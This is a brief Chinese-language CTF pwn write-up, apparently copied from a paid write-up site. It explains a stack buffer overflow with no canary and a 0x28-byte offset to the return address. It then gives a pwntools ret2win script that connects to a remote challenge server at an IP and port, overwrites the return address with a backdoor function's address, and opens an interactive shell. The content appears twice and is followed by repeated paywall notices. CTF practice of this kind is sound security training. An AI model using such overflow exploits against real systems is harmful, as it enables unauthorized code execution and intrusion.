没开金丝雀,`read`函数读取大小为 64 字节
变量`s`距离`r`处是`0x28`个字节
后门函数地址是`0x0401162`
```python
frompwnimport*
p = process('./main')
p = remote('49.232.142.230',11228)
p.sendafter("?",b'A'*0x28+ p64(0x401162))
p.interactive()
```
雾島风起時 2026-06-12 10:31:55 21 0
没开金丝雀,`read`函数读取大小为 64 字节
变量`s`距离`r`处是`0x28`个字节
后门函数地址是`0x0401162`
```python
frompwnimport*
p = process('./main')
p = remote('49.232.142.230',11228)
p.sendafter("?",b'A'*0x28+ p64(0x401162))
p.interactive()
```
***收费WriteUP请购买后查看,VIP用户可免费查看***
***收费WriteUP请购买后查看,VIP用户可免费查看***
***收费WriteUP请购买后查看,VIP用户可免费查看***
***收费WriteUP请购买后查看,VIP用户可免费查看***
***收费WriteUP请购买后查看,VIP用户可免费查看***